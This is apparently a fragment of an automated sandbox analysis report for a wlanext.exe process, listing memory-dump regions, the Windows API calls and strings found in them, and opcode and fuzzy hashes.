                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: Count64Tick$ErrorFileIncrementInterlockedLastMessageReadSleepTrace
                                                                                • String ID:
                                                                                • API String ID: 1134999173-0
                                                                                • Opcode ID: 3aaef149edc13a1df97e6f7c113731a286d9e7e123f7ac78e20b8b2210a7ea4c
                                                                                • Instruction ID: d38dbb355a2eeba0511ac462f80aaa85439624ce5ee140a546d4b1f09df3e383
                                                                                • Opcode Fuzzy Hash: 3aaef149edc13a1df97e6f7c113731a286d9e7e123f7ac78e20b8b2210a7ea4c
                                                                                • Instruction Fuzzy Hash: 9A71B235500200ABEF399FA4C888BAE7B66FB18314F24457DF815969E2C3B4C9D3EB50
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(00C12600), ref: 00C0A5A6
                                                                                • LeaveCriticalSection.KERNEL32(00C12600), ref: 00C0A5E5
                                                                                • QueueUserWorkItem.KERNEL32(Function_0000A4FA,00000000,00000010), ref: 00C0A615
                                                                                • ChangeTimerQueueTimer.KERNEL32(7FFFFFFF,00000064), ref: 00C0A658
                                                                                • GetLastError.KERNEL32 ref: 00C0A662
                                                                                • GetLastError.KERNEL32 ref: 00C0A6E4
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalErrorLastQueueSectionTimer$ChangeEnterItemLeaveUserWork
                                                                                • String ID:
                                                                                • API String ID: 2163494555-0
                                                                                • Opcode ID: 541b4380a6f06dc71e76e34f3d529d46a4f68eb1ca9593713d600e93fef1247b
                                                                                • Instruction ID: 37ec4d5d027b0e8b6349928ee42d3e576211b5c234ac9543eddef84d1768bdb8
                                                                                • Opcode Fuzzy Hash: 541b4380a6f06dc71e76e34f3d529d46a4f68eb1ca9593713d600e93fef1247b
                                                                                • Instruction Fuzzy Hash: DA31F434144300ABEB2ECF14DC48BA97B76FB06708F288119F910461F2C7B6C9A1EB52
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00C0E3BE
                                                                                • InitializeCriticalSection.KERNEL32(?), ref: 00C0E3CB
                                                                                • InitializeCriticalSection.KERNEL32(?), ref: 00C0E413
                                                                                • CreateEventW.KERNEL32(0000000C,00000001,00000000,00000000), ref: 00C0E45F
                                                                                • GetLastError.KERNEL32 ref: 00C0E46F
                                                                                  • Part of subcall function 00C0E291: CloseHandle.KERNEL32(?), ref: 00C0E2A3
                                                                                  • Part of subcall function 00C0E291: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,00C02A48,00C12000,?,00C0EEB4), ref: 00C0E2B9
                                                                                  • Part of subcall function 00C0E291: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,00C02A48,00C12000,?,00C0EEB4), ref: 00C0E2C6
                                                                                  • Part of subcall function 00C0E291: memset.MSVCRT ref: 00C0E2D1
                                                                                • SetEvent.KERNEL32(00000000), ref: 00C0E484
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$DeleteEventInitializememset$CloseCreateErrorHandleLast
                                                                                • String ID:
                                                                                • API String ID: 3741578413-0
                                                                                • Opcode ID: baba681496171051577fd7213bb74ed4e029d407d88ad560993a137cf36eab70
                                                                                • Instruction ID: dbe403e56e27ece1ddfebceb7c91c9127ee60ec49579e605010d147599b60b0f
                                                                                • Opcode Fuzzy Hash: baba681496171051577fd7213bb74ed4e029d407d88ad560993a137cf36eab70
                                                                                • Instruction Fuzzy Hash: 1F11BC75D40214FBDB009FE5C948B9EFFB8EF98710F21851AF901A7291D6B08A41EFA0
                                                                                APIs
                                                                                • RegOpenKeyExW.ADVAPI32 ref: 00C03499
                                                                                • RegQueryValueExW.ADVAPI32(?,HandlerTimeout,00000000,?,?,00000004), ref: 00C034F2
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00C03564
                                                                                  • Part of subcall function 00C02CE5: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 00C02CFA
                                                                                Strings
                                                                                • HandlerTimeout, xrefs: 00C034EA
                                                                                • Software\Microsoft\Wlansvc\IHVExtensibility, xrefs: 00C03485
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: CloseMessageOpenQueryTraceValue
                                                                                • String ID: HandlerTimeout$Software\Microsoft\Wlansvc\IHVExtensibility
                                                                                • API String ID: 3821667754-1486466383
                                                                                • Opcode ID: a8a9fac799908d2e1a6a5df1f10c32d7b519b0a480da15170f90322a6fa48f37
                                                                                • Instruction ID: b85964f972fa427737bb557cb0d7f2e5782041783b6f0aa7d40defcfe9afff7c
                                                                                • Opcode Fuzzy Hash: a8a9fac799908d2e1a6a5df1f10c32d7b519b0a480da15170f90322a6fa48f37
                                                                                • Instruction Fuzzy Hash: 63415D71A00288AFEB26CF94DC48F9EBEBABB09704F154495E511A71F2C371CB94DB54
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(00C12620,00C01680,00C120B0,?,?,?,00C038A6,00C120B0,00C120B0,00C120A0), ref: 00C0A1E6
                                                                                • QueueUserWorkItem.KERNEL32(00C09B23,00000000,00000010), ref: 00C0A24E
                                                                                • GetLastError.KERNEL32(?,?,?,00C038A6,00C120B0,00C120B0,00C120A0), ref: 00C0A258
                                                                                  • Part of subcall function 00C02CE5: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 00C02CFA
                                                                                • LeaveCriticalSection.KERNEL32(00C12620,C01F8AD4,?,?,?,00C038A6,00C120B0,00C120B0,00C120A0), ref: 00C0A2CB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterErrorItemLastLeaveMessageQueueTraceUserWork
                                                                                • String ID: call table
                                                                                • API String ID: 1836903735-1857531114
                                                                                • Opcode ID: 010c75d694a68347d03f3c25a0a7ebec51bf7e3c40c6a35e974916bea636f129
                                                                                • Instruction ID: 55ff84c2ce684e788bfb1a9e6c253cb383e5c25ba75b38b8d6f78847003a86c4
                                                                                • Opcode Fuzzy Hash: 010c75d694a68347d03f3c25a0a7ebec51bf7e3c40c6a35e974916bea636f129
                                                                                • Instruction Fuzzy Hash: CD419074680344BFEF158F90C948F98BFA5BB05748F1580A4FA159B1F2C372DA90EB46
                                                                                APIs
                                                                                • ___swprintf_l.LIBCMT ref: 020AEA22
                                                                                  • Part of subcall function 020813CB: ___swprintf_l.LIBCMT ref: 0208146B
                                                                                  • Part of subcall function 020813CB: ___swprintf_l.LIBCMT ref: 02081490
                                                                                • ___swprintf_l.LIBCMT ref: 0208156D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.923627309.0000000002020000.00000040.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.923627309.0000000002110000.00000040.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.923627309.0000000002120000.00000040.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.923627309.0000000002124000.00000040.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.923627309.0000000002127000.00000040.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.923627309.0000000002130000.00000040.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.923627309.0000000002190000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_2020000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: ___swprintf_l
                                                                                • String ID: %%%u$]:%u
                                                                                • API String ID: 48624451-3050659472
                                                                                • Opcode ID: 34fe918236c3a0f0eafeec7918a8aa2a167af07c85bccd96f9c1da010f6528ce
                                                                                • Instruction ID: 4cdf00441a7d121ebe7ec1066c042cd656cb9bacd610d3e50f854f60156c06b4
                                                                                • Opcode Fuzzy Hash: 34fe918236c3a0f0eafeec7918a8aa2a167af07c85bccd96f9c1da010f6528ce
                                                                                • Instruction Fuzzy Hash: DD2193B2900319EBDB61EE54CC40AEFB3EDAF10704F444565EC8AD7140DB70AA59DBE1
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(00C12600,00000001,00C120B0,?,?,?,00C08ADC,?,00C085CC,?,00000000,?,00C120B0,00000000,?,?), ref: 00C0ABF0
                                                                                • ChangeTimerQueueTimer.KERNEL32(00000064,00000064,00000000,?,?,?,00C08ADC,?,00C085CC,?,00000000,?,00C120B0,00000000,?,?), ref: 00C0AC51
                                                                                • GetLastError.KERNEL32(?,?,?,00C08ADC,?,00C085CC,?,00000000,?,00C120B0,00000000,?,?,00000000,?,00000000), ref: 00C0AC5B
                                                                                • GetTickCount.KERNEL32(00000014,00000000,00000000,?,?,?,00C08ADC,?,00C085CC,?,00000000,?,00C120B0,00000000,?,?), ref: 00C0AD1A
                                                                                  • Part of subcall function 00C02CE5: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 00C02CFA
                                                                                • LeaveCriticalSection.KERNEL32(00C12600,00000000,00000000,?,?,?,00C08ADC,?,00C085CC,?,00000000,?,00C120B0,00000000,?,?), ref: 00C0AD74
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSectionTimer$ChangeCountEnterErrorLastLeaveMessageQueueTickTrace
                                                                                • String ID:
                                                                                • API String ID: 3417154314-0
                                                                                • Opcode ID: e7dbad7b25d774a8b0598feccc1705f5bd1633c5ad5220f28e23db338763f286
                                                                                • Instruction ID: d2a84fb98e2ce58f3dfee8f177f338e201ad1be5e0f4d6d5391f1dc547b5ecd4
                                                                                • Opcode Fuzzy Hash: e7dbad7b25d774a8b0598feccc1705f5bd1633c5ad5220f28e23db338763f286
                                                                                • Instruction Fuzzy Hash: 83518D38640304AFEB25CF54D988B9DBBB6FB09304F1541A9E9119B2F2C371CE90EB52
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(?,00C01C50,00C12000,00000001,?,00C0999D,?,00C01680,00C12000,?,00C02F74,00000000,00C120A0,?,00000002,00000000), ref: 00C0E2F6
                                                                                • EnterCriticalSection.KERNEL32(?,?,00C0999D,?,00C01680,00C12000,?,00C02F74,00000000,00C120A0,?,00000002,00000000,00000001,00000000), ref: 00C0E2FC
                                                                                • ResetEvent.KERNEL32(?,?,00C0999D,?,00C01680,00C12000,?,00C02F74,00000000,00C120A0,?,00000002,00000000,00000001,00000000), ref: 00C0E30E
                                                                                • LeaveCriticalSection.KERNEL32(?,?,00C0999D,?,00C01680,00C12000,?,00C02F74,00000000,00C120A0,?,00000002,00000000,00000001,00000000), ref: 00C0E31B
                                                                                • LeaveCriticalSection.KERNEL32(?,?,00C0999D,?,00C01680,00C12000,?,00C02F74,00000000,00C120A0,?,00000002,00000000,00000001,00000000), ref: 00C0E31E
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave$EventReset
                                                                                • String ID:
                                                                                • API String ID: 3754699133-0
                                                                                • Opcode ID: cb7af7820fbf363a53d232f39e967be8e0d7d53dd45ede9da9bbd57c23dd7c7e
                                                                                • Instruction ID: 8e9c92ea4449b07804564232f139dcfcbc31b9223a1e8e36032062cc68c05091
                                                                                • Opcode Fuzzy Hash: cb7af7820fbf363a53d232f39e967be8e0d7d53dd45ede9da9bbd57c23dd7c7e
                                                                                • Instruction Fuzzy Hash: 35E03076100649ABD310AB56EC84D8BF7ADEFD53643164415E94283520C631F945CBB0
                                                                                APIs
                                                                                • QueueUserWorkItem.KERNEL32(Function_00003C03,00000000,00000010), ref: 00C03C50
                                                                                • GetLastError.KERNEL32 ref: 00C03C5A
                                                                                • GetCurrentProcess.KERNEL32(000002C9), ref: 00C03C9B
                                                                                • TerminateProcess.KERNEL32(00000000), ref: 00C03CA2
                                                                                • ExitProcess.KERNEL32 ref: 00C03CA9
                                                                                  • Part of subcall function 00C0F8F1: TraceMessage.ADVAPI32(?,00000000,0000002B,?,?,?,00000004,00000000,?,00C09358,00C01634,00C01610,0000000A,00C01C50,?,?), ref: 00C0F90C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CurrentErrorExitItemLastMessageQueueTerminateTraceUserWork
                                                                                • String ID:
                                                                                • API String ID: 2743426024-0
                                                                                • Opcode ID: 5a355e2a55300d46fc00c30dad584687d3fd884125361411cafe77d1386b943d
                                                                                • Instruction ID: a6e69f324ccf762101cc3f9430de58422cffaa7083f4da66abc52fef57add3a5
                                                                                • Opcode Fuzzy Hash: 5a355e2a55300d46fc00c30dad584687d3fd884125361411cafe77d1386b943d
                                                                                • Instruction Fuzzy Hash: 3EF02734540280AFF72A9B20DC0DFACBA18BF16785F290618FF12E40E0C7B18B82DB54
                                                                                APIs
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 020A22F4
                                                                                Strings
                                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 020A22FC
                                                                                • RTL: Re-Waiting, xrefs: 020A2328
                                                                                • RTL: Resource at %p, xrefs: 020A230B
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.923627309.0000000002020000.00000040.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.923627309.0000000002110000.00000040.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.923627309.0000000002120000.00000040.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.923627309.0000000002124000.00000040.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.923627309.0000000002127000.00000040.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.923627309.0000000002130000.00000040.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.923627309.0000000002190000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_2020000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                • API String ID: 885266447-871070163
Strings
• RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 020A248D
• RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 020A24BD
• RTL: Re-Waiting, xrefs: 020A24FA
Memory Dump Source
• Source File: 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: true
• Associated: 0000000E.00000002.923627309.0000000002020000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002110000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002120000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002124000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002127000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002130000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002190000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_2020000_wlanext.jbxd
Similarity
• API ID:
• String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
• API String ID: 0-3177188983
APIs
  • Part of subcall function 00C0E2E4: EnterCriticalSection.KERNEL32(?,00C01C50,00C12000,00000001,?,00C0999D,?,00C01680,00C12000,?,00C02F74,00000000,00C120A0,?,00000002,00000000), ref: 00C0E2F6
  • Part of subcall function 00C0E2E4: EnterCriticalSection.KERNEL32(?,?,00C0999D,?,00C01680,00C12000,?,00C02F74,00000000,00C120A0,?,00000002,00000000,00000001,00000000), ref: 00C0E2FC
  • Part of subcall function 00C0E2E4: ResetEvent.KERNEL32(?,?,00C0999D,?,00C01680,00C12000,?,00C02F74,00000000,00C120A0,?,00000002,00000000,00000001,00000000), ref: 00C0E30E
  • Part of subcall function 00C0E2E4: LeaveCriticalSection.KERNEL32(?,?,00C0999D,?,00C01680,00C12000,?,00C02F74,00000000,00C120A0,?,00000002,00000000,00000001,00000000), ref: 00C0E31B
  • Part of subcall function 00C0E2E4: LeaveCriticalSection.KERNEL32(?,?,00C0999D,?,00C01680,00C12000,?,00C02F74,00000000,00C120A0,?,00000002,00000000,00000001,00000000), ref: 00C0E31E
• WriteFile.KERNEL32(?,?,?,00000000,?), ref: 00C0F898
• GetLastError.KERNEL32(?,?,?,00C0D238,?,?,?,?,Function_0000CFE4,?,00000004,SendPacket,00000000,00000000), ref: 00C0F8A2
• InterlockedIncrement.KERNEL32(00C124C4), ref: 00C0F8BB
Strings
Memory Dump Source
• Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
Similarity
• API ID: CriticalSection$EnterLeave$ErrorEventFileIncrementInterlockedLastResetWrite
• String ID: SendPacket
• API String ID: 3766001357-2548714312
APIs
Memory Dump Source
• Source File: 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: true
• Associated: 0000000E.00000002.923627309.0000000002020000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002110000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002120000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002124000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002127000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002130000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002190000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_2020000_wlanext.jbxd
Similarity
• API ID: __fassign
• String ID:
• API String ID: 3965848254-0
APIs
• GetCurrentThread.KERNEL32(00000008,00000001,00000000,?,00C12000,00000000,?,?,00C0B95F,?,?,00000000), ref: 00C0B851
• OpenThreadToken.ADVAPI32(00000000,?,?,00C0B95F,?,?,00000000,?,?,?,?,00C067ED,?,00000007,InitService,00000000), ref: 00C0B858
• GetLastError.KERNEL32(?,?,00C0B95F,?,?,00000000,?,?,?,?,00C067ED,?,00000007,InitService,00000000,00000000), ref: 00C0B862
• CloseHandle.KERNEL32(00000000), ref: 00C0B89A
  • Part of subcall function 00C02CE5: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 00C02CFA
Memory Dump Source
• Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
Similarity
• API ID: Thread$CloseCurrentErrorHandleLastMessageOpenTokenTrace
• String ID:
• API String ID: 3986309575-0
APIs
• GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00C01C94,00C12000,?,?,00C0B169), ref: 00C0B78E
• OpenProcessToken.ADVAPI32(00000000,?,?,00C0B169), ref: 00C0B795
• GetLastError.KERNEL32(?,?,00C0B169), ref: 00C0B79F
• CloseHandle.KERNEL32(00000000), ref: 00C0B7D7
  • Part of subcall function 00C02CE5: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 00C02CFA
Memory Dump Source
• Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
Similarity
• API ID: Process$CloseCurrentErrorHandleLastMessageOpenTokenTrace
• String ID:
• API String ID: 3604925983-0
APIs
• CloseHandle.KERNEL32(?), ref: 00C0E2A3
• DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,00C02A48,00C12000,?,00C0EEB4), ref: 00C0E2B9
• DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,00C02A48,00C12000,?,00C0EEB4), ref: 00C0E2C6
• memset.MSVCRT ref: 00C0E2D1
Memory Dump Source
• Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
Similarity
• API ID: CriticalDeleteSection$CloseHandlememset
• String ID:
• API String ID: 3880144888-0
APIs
  • Part of subcall function 00C0B8D2: RpcImpersonateClient.RPCRT4(00000000), ref: 00C0B925
  • Part of subcall function 00C06142: EnterCriticalSection.KERNEL32(00C12500), ref: 00C06193
  • Part of subcall function 00C06142: LeaveCriticalSection.KERNEL32(00C12500), ref: 00C064CF
• SetEvent.KERNEL32(?,?,?,?,00000000,00000000,?,?,?,?,?,?,00000007,InitService,00000000,00000000), ref: 00C068A2
• GetLastError.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,00000007,InitService,00000000,00000000), ref: 00C068AC
  • Part of subcall function 00C0576C: TraceMessage.ADVAPI32(?,?,0000002B,?,?,NULL,0000000A,?,00000004,00000000), ref: 00C057CE
Strings
Memory Dump Source
• Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
Similarity
• API ID: CriticalSection$ClientEnterErrorEventImpersonateLastLeaveMessageTrace
• String ID: InitService
• API String ID: 1998968471-1647998688
Strings
Memory Dump Source
• Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
Similarity
• API ID:
• String ID: HtCreateHandleTable
• API String ID: 0-3622291215
APIs
• DeleteCriticalSection.KERNEL32(?,?,HtDestroyHandleTable,00000183,?,00C12000,?,00C09AB6,00C12000,00C01C50,00C12000,00C12620,?,?,00C09D66,?), ref: 00C0E558
Strings
Memory Dump Source
• Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
Similarity
• API ID: CriticalDeleteSection
• String ID: HtDestroyHandleTable$L2Ht
• API String ID: 166494926-2242761165
APIs
• TraceMessage.ADVAPI32(?,?,0000002B,?,?,?,00000004,NULL,0000000A,?,00000004,00000000), ref: 00C02D73
Strings
Memory Dump Source
• Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
Similarity
• API ID: MessageTrace
• String ID: <NULL>$NULL
• API String ID: 471583391-888386124
APIs
• TraceMessage.ADVAPI32(?,?,0000002B,?,?,NULL,0000000A,?,00000004,00000000), ref: 00C057CE
Strings
Memory Dump Source
• Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
Similarity
• API ID: MessageTrace
• String ID: <NULL>$NULL
• API String ID: 471583391-888386124
APIs
• TraceMessage.ADVAPI32(00000021,00C01610,0000002B,00C0B6EA,00C01634,NULL,0000000A,00000000,?,00C0B6EA,00C01634,00C01610,00000021,00C01D14,?), ref: 00C0B414
Strings
Memory Dump Source
• Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
Similarity
• API ID: MessageTrace
• String ID: <NULL>$NULL
• API String ID: 471583391-888386124
APIs
• GetProcessHeap.KERNEL32(?,?,?,?,?,00C0E806,?,HtShrinkTable,000003AD), ref: 00C0ED1F
• GetLastError.KERNEL32(?,?,00C0E806,?,HtShrinkTable,000003AD), ref: 00C0ED35
• HeapFree.KERNEL32(00000000,00000000,?), ref: 00C0ED77
• GetLastError.KERNEL32(?,?,00C0E806,?,HtShrinkTable,000003AD), ref: 00C0EDB5
  • Part of subcall function 00C0EB72: TraceMessage.ADVAPI32(0000037A,?,0000002B,?,?,00C0E76B,00000005,?,00000004,0000037A,00000004,00000000,00000000,?,00C0EC87,00C01634), ref: 00C0EBBC
Memory Dump Source
• Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
Similarity
• API ID: ErrorHeapLast$FreeMessageProcessTrace
• String ID:
• API String ID: 782704287-0
                                                                                • Opcode ID: 112d1b42e397de5f192260921e4f9cedeaa31b9f2ed7c8eb964cb1b4941afa41
                                                                                • Instruction ID: 50ec1f1f7581b509458258d9128234f78131397e46d04408872452a9e018f8d8
                                                                                • Opcode Fuzzy Hash: 112d1b42e397de5f192260921e4f9cedeaa31b9f2ed7c8eb964cb1b4941afa41
                                                                                • Instruction Fuzzy Hash: 4E215771140305ABEF16AF45CC18FAA7BA6FF08344F244859FA525A1E2D772CAA1EF50